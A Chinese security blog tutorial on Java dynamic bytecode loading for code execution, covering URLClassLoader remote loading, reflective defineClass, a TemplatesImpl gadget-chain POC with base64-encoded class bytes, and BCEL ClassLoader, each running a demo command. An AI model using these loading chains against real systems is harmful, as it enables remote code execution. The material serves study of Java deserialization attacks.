[Java安全]Java动态加载字节码

最新推荐文章于 2023-08-21 09:05:39 发布
最新推荐文章于 2023-08-21 09:05:39 发布
阅读量726 收藏 1
点赞数 3
分类专栏: JAVA安全 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/124011939
版权

什么是java字节码

严格来说,Java字节码(ByteCode)其实仅仅指的是Java虚拟机执行使用的一类指令,通常被存储在.class文件中。

这里所有能够恢复成一个类并在JVM虚拟机里加载的字节序列,都在我们的探讨范围内

利用URLClassLoader加载远程class文件

这个很基础,直接上代码:

先编写一个evil.java并编译为class文件,python开一个http服务

import java.io.IOException;

public class evil {
    public evil() throws IOException{
        Runtime.getRuntime().exec("calc");
    }
}

evilClassLoader。java

import java.net.URL;
import java.net.URLClassLoader;
public class evilClassLoader {
    public static void main( String[] args ) throws Exception {
        URL[] urls = {new URL("http://127.0.0.1:8000/")};
        URLClassLoader loader = URLClassLoader.newInstance(urls);
        Class c = loader.loadClass("evil");
        c.newInstance();
    }
}

image-20220404154323775

作为攻击者,如果我们能够控制目标Java ClassLoader的基础路径为一个http服务器,则可以利用远程加载的方式执行任意代码了。

利用ClassLoader#defineClass直接加载字节码

在类加载器的学习中,我们知道不管是加载远程class文件,还是本地的class或jar文件,Java会经历三个方法的调用:

image-20220404155227824

其中核心的部分是 defineClass ,他决定了如何将一段字节流转变成一个Java类。

private native Class<?> defineClass1(String name, byte[] b, int off, int len,
                                         ProtectionDomain pd, String source);

这里我们了解其用法就可以了,写一个demo:

evil.java

import java.io.IOException;

public class evil {
    public evil() throws IOException{
        Runtime.getRuntime().exec("calc");
    }
}

将其编译为class文件后再base64,可以在linux上执行cat evil.class | base64

image-20220404160354736

declassloader.java

import java.lang.reflect.Method;
import java.util.Base64;

public class declassloader {
    public static void main(String[] args) throws Exception{
        Class clazz = Class.forName("java.lang.ClassLoader");
        Method defineClassMethod = clazz.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
        defineClassMethod.setAccessible(true);
        byte[] bytes = Base64.getDecoder().decode("yv66vgAAADQAHAoABgAPCgAQABEIABIKABAAEwcAFAcAFQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAWAQAKU291cmNlRmlsZQEACWV2aWwuamF2YQwABwAIBwAXDAAYABkBAARjYWxjDAAaABsBAARldmlsAQAQamF2YS9sYW5nL09iamVjdAEAE2phdmEvaW8vSU9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAABAAEABwAIAAIACQAAAC4AAgABAAAADiq3AAG4AAISA7YABFexAAAAAQAKAAAADgADAAAABAAEAAUADQAGAAsAAAAEAAEADAABAA0AAAACAA4=");
        Class targetClass = (Class) defineClassMethod.invoke(ClassLoader.getSystemClassLoader(),"evil",bytes,0,bytes.length);
        targetClass.newInstance();

    }
}

image-20220404165840686

在实际场景中,因为defineClass方法作用域是不开放的,所以攻击者很少能直接利用到它,但它却是我

们常用的一个攻击链 TemplatesImpl 的基石。

利用TemplatesImpl加载字节码

在TemplatesImpl类中定义了一个内部静态类TransletClassLoader

 static final class TransletClassLoader extends ClassLoader {
        private final Map<String,Class> _loadedExternalExtensionFunctions;

         TransletClassLoader(ClassLoader parent) {
             super(parent);
            _loadedExternalExtensionFunctions = null;
        }

        TransletClassLoader(ClassLoader parent,Map<String, Class> mapEF) {
            super(parent);
            _loadedExternalExtensionFunctions = mapEF;
        }

        public Class<?> loadClass(String name) throws ClassNotFoundException {
            Class<?> ret = null;
            // The _loadedExternalExtensionFunctions will be empty when the
            // SecurityManager is not set and the FSP is turned off
            if (_loadedExternalExtensionFunctions != null) {
                ret = _loadedExternalExtensionFunctions.get(name);
            }
            if (ret == null) {
                ret = super.loadClass(name);
            }
            return ret;
         }

        /**
         * Access to final protected superclass member from outer class.
         */
        Class defineClass(final byte[] b) {
            return defineClass(null, b, 0, b.length);
        }
    }

这个类里重写了 defineClass 方法,并且这里没有显式地声明其定义域。Java中默认情况下,如果一个方法没有显式声明作用域,其作用域为default。所以也就是说这里的 defineClass 由其父类的protected类型变成了一个default类型的方法,可以被类外部调用。

往上跟一下,TemplatesImpldefineTransletClasses方法

image-20220404171633437

defineTransletClassesgetTransletInstance中调用:

image-20220404171808043

再往上追,getTransletInstance又在newTransformer中被调用

image-20220404180043671

此时newTransformer已经是public方法了外部可以直接调用,所以利用链:

TemplatesImpl#newTransformer() ->
TemplatesImpl#getTransletInstance() -> 
TemplatesImpl#defineTransletClasses()-> 
TransletClassLoader#defineClass()

由此我们构造POC:

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import java.lang.reflect.Field;
import java.util.Base64;

public class temp {
    public static void main(String[] args) throws Exception {
        byte[] bytes = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgcAGwEAClNvdXJjZUZpbGUBAApldmlsMS5qYXZhDAAOAA8HABwMAB0AHgEABGNhbGMMAB8AIAEABWV2aWwxAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAKAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAADQALAAAABAABAAwAAQAOAA8AAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAAQAAQAEQANABIACwAAAAQAAQAQAAEAEQAAAAIAEg==");
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates,"_bytecodes",new byte[][]{bytes});
        setFieldValue(templates,"_name","snakin");
        setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());
        templates.newTransformer();
    }
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj,value);
    }
}

首先我们利用TemplatesImpl的类构造器直接生成对象,后续利用反射设置属性

setFieldValue是利用反射给私有变量赋值

public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
    Field field = obj.getClass().getDeclaredField(fieldName);
    field.setAccessible(true);
    field.set(obj, value);
}

初始化之后来到getTransletInstance,这里有限制条件

if (_name == null) return null;
if (_class == null) defineTransletClasses();

我们需要满足_name不为空,所以给它设置一个值;同时_class默认为null,这里不用管它

setFieldValue(templates,"_name","snakin");

进入defineTransletClasses

if (_bytecodes == null) {
            ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
            throw new TransformerConfigurationException(err.toString());
        }

这里需要满足_bytecodes不为null,继续往下

TransletClassLoader loader = (TransletClassLoader)
            AccessController.doPrivileged(new PrivilegedAction() {
                public Object run() {
                    return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
                }
            });

run()方法中调用了_tfactory.getExternalExtensionsMap(),所以_tfactory不能为null

private transient TransformerFactoryImpl _tfactory = null;

构造一下:

setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());

之后:

image-20220404182854852

这里就会调用自定义的 ClassLoader 去加载 _bytecodes 中的 byte[],因此_bytecodes 是我们要加载的类的字节码数组。

需要注意的是:TemplatesImpl 中对加载的字节码是有一定要求的:这个字节码对应的类必须 是 com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet 的子类。

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class evil1 extends AbstractTranslet {
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }

    public evil1 () throws Exception  {
        super();
        Runtime.getRuntime().exec("calc");
    }
}

同理,编译为class文件之后再base64,之后填入POC运行即可

image-20220404183508011

利用BCEL ClassLoader加载字节码

BCEL的全名应该是Apache Commons BCEL,属于Apache Commons项目下的一个子项目,但其因为被Apache Xalan所使用,而Apache Xalan又是Java内部对于JAXP的实现,所以BCEL也被包含在了JDK的原生库中。

p神在博客中对它有详细的讲解:BCEL Classloader去哪了

我们可以通过BCEL提供的两个类 Repository 和 Utility 来利用: Repository 用于将一个Java Class先转换成原生字节码,当然这里也可以直接使用javac命令来编译java文件生成字节码; Utility 用于将原生的字节码转换成BCEL格式的字节码。

写一个demo看一下:

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;


public class EvilBCEL {
    public static void main(String[] args) throws Exception {
        JavaClass javaClass = Repository.lookupClass(Evil.class);
        String code = Utility.encode(javaClass.getBytes(),true);
        new ClassLoader().loadClass("$$BCEL$$"+code).newInstance();
    }
}

import java.io.IOException;

public class evil {
    public evil() throws IOException{
        Runtime.getRuntime().exec("calc");
    }
}

要加上$$BCEL$$是因为:

BCEL这个包中有个有趣的类com.sun.org.apache.bcel.internal.util.ClassLoader,他是一个ClassLoader,但是他重写了Java内置的ClassLoader#loadClass()方法。

ClassLoader#loadClass()中,其会判断类名是否是$$BCEL$$开头,如果是的话,将会对这个字符串进行decode。

image-20220404204024847

最后需要注意Java 8u251之后ClassLoader就被删除了,如果要用到的话注意jdk的版本。

参考:

https://blog.csdn.net/rfrder/article/details/119763746

Snakin_ya
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Java 将字符串动态生成字节码的实现方法
09-04
Java编程语言中,动态生成字节码是一项高级技术,它允许程序在运行时创建新的类或修改已有的类。这种技术通常用于元编程、AOP(面向切面编程)和性能优化等领域。本文将详细讲解如何使用Java将字符串转换为可执行...
Java字节码指令集的使用详细
09-05
理解并掌握Java字节码指令集对于优化Java代码性能、编写字节码级别的工具,或者进行代码分析和安全审计都是非常重要的。通过深入研究字节码指令,开发者可以更好地理解JVM如何执行程序,从而编写更高效、更可靠的...
Spring Boot jolokia 配置不当导致RCE漏洞
Bird&Bird
03-16 3758
访问 /jolokia/list 接口,查看是否存在 ch.qos.logback.classic.jmx.JMXConfigurator 和 reloadByURL 关键词。根据实际情况修改 springboot-realm-jndi-rce.py 脚本中的目标地址,RMI 地址、端口等信息,然后在自己控制的服务器上运行。普通 JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP),但相关环境可绕过。环境运行起来后,访问一下/jolokia接口。
Java动态字节码注入技术
最新发布
琅琊之榜
08-21 1081
Java动态字节码注入技术是一种在运行时修改Java字节码的技术。它允许开发者在程序运行期间动态地向现有的Java类中注入字节码,并改变类的行为和功能。这项技术通常用于实现AOP(面向切面编程)、代码增强、动态代理等需求。
[虎符CTF 2021]Internal System
weixin_43610673的博客
06-19 704
主要记录下解题过程,详细的分析:虎符 CTF2021 Web 零解题 Internal System WriteUp 打开是个登陆界面,F12可以看到提示 访问/source得到源码 先看/login路由的内容 Nodejs审计的不多,所以这里是直接截图大佬的博客。 这里通过数组来绕过admin限制,而数组在后面和salt字符串拼接后转为字符串,不影响后面的逻辑。 /login?username[]=admin&password=admin 跳转到一个代理器页面,通过这个页面我们可以直接访问到
JAVA动态字节
weixin_34161064的博客
02-17 248
概述 java动态字节码指的是在java字节码生成之后,对其进行修改,增强其功能,这种方式相当于对代码的二进制文件进行修改。动态java字节码主要是为了减少冗余代码,提高性能。 实现字节码增强的主要步骤: 修改字节码。在内存中获取到原来的字节码,通过一些工具(如ASM、Javaasist)来修改它的byte[]数组,得到一个新的byte[]数组。 使修改后的字节码生效 自定义ClassLo...
java 动态字节码技术javassist 动态用代码修改添类、方法代码
HumorChen的博客
12-30 4608
平时我们可以使用AOP来动态的操作方法的处理过程,在before、after、around、return、throw Exception等关键时机作出处理,而AOP是没办法直接修改被代理方法内部逻辑的。当有这种需求的时候就只能使用动态字节码技术来解决了。热更新代码这些其实也是通过动态字节码技术实现的。补充说明:java动态字节码技术目前主流的是两种,一个是ASM,一个是javassist。(两种都必须在类被到jvm之前去修改)
java注解_反射_字节码_类机制.zip
05-13
java 注解 反射 字节码 类 包括pdf资料以及全部源码文件,具有非常大参考价值和学习意义
java字节码框架ASM操作字节码的方法浅析
08-31
Java字节码框架ASM是一个强大的库,它允许程序员在运行时动态生成和修改Java类和接口的字节码。ASM提供了对JVM字节码的底层访问,这使得开发者能够实现诸如AOP(面向切面编程)或者元编程等高级功能。 首先,我们...
java字节码框架ASM的深入学习
08-31
2. 类增强:ASM可以在类Java虚拟机之前修改类的字节码,实现类的行为增强。 3. 类分析:ASM能够解析类文件中的元数据,如类名、方法、属性和字节码,为其他工具(如代码分析器或性能监控工具)提供基础。 要...
Java动态(一)——java源文件动态编译为class文件
04-04
NULL 博文链接:https://zheng12tian.iteye.com/blog/1488813
Java动态生成代码并编译
11-02
Java动态生成代码并编译Java动态生成代码并编译
详解Java动态字节码技术
heikeb的专栏
10-12 1076
详解Java动态字节码技术
c/c++中如何实现动态动态(含完整工程示例代码)
热门推荐
技术需要分享
09-22 1万+
本文将win、linux、卸动态库,并从动态库链接模块中获取类实例或函数地址等封装成统一的API接口,并集成在dllLoad.h/dllLoad.cpp中实现。构建一个注册类RegisterM,内置一个map容器,用来装动态库模块,并统一提供模块索引、及从模块中实现类实例获取、删除、函数地址获取等功能。 在动态库实现方面,提供一个虚拟元类MetaObject,然后在库的cpp文件中建立子类继承该类,实现其具体功能,并在cpp文件中直接提供函数API
有哪些方法可以在运行时动态生成一个Java类?
weixin_44240370的博客
07-25 988
之前的文章中,提到了动态代理,先举一个比较常见的应用场景,在JPA中仅仅是实现了Jps两个接口,就自动生成了类,帮助我们完成Sql基本操作,并且层层封装,从配置、驱动、到SQL语句的写入都帮我们完成,换句话说,动态的生成了一个方法完成了操作,这也就是动态代理操作,但是文章中并没有很仔细的进行说明,因此在本文中将进行深入的分析。 概述 我们从原始的java类来进行源分析,通常是我们编写完程序,调用j...
ClassLoader 源码分析。
孤芳不自赏
01-13 879
/** * 类器是负责类的对象。ClassLoader 类是一个抽象类。 * 如果给定类的二进制名称,那么类器会试图查找或生成构成类定义的数据。 * 一般策略是将名称转换为某个文件名,然后从文件系统读取该名称的“类文件”。 * 每个 Class 对象都包含一个对定义它的 ClassLoader 的引用。 * 数组类的 Class 对象不是由类器创建的,而是由 Jav...
java defineclass1_Bad version number in .class file at java.lang.ClassLoader.defineClass1(Native Met...
weixin_35757191的博客
02-23 155
2014040303:16:07,711ERROR[org.springframework.web.context.ContextLoader]Contextinitializationfailedjava.lang.UnsupportedClassVersionError:Badversionnumberin.classfileatja...20140403 03:16:07,711 ERROR...
Classloader类的缓存机制
lz710117239的博客
06-17 3152
当我们用ClassLoader去类的时候,我们会看到它的loadclass方法,如下: protected Class loadClass(String name, boolean resolve) throws ClassNotFoundException { synchronized (getClassLoadingLock(name)) {
java动态编译动态
04-04
Java动态编译指的是在程序运行时动态地将Java源代码编译成Java字节码,然后再将字节到JVM中执行。Java动态编译可以通过Java Compiler API来实现,它提供了一组API接口,可以在程序运行时动态地编译Java源代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值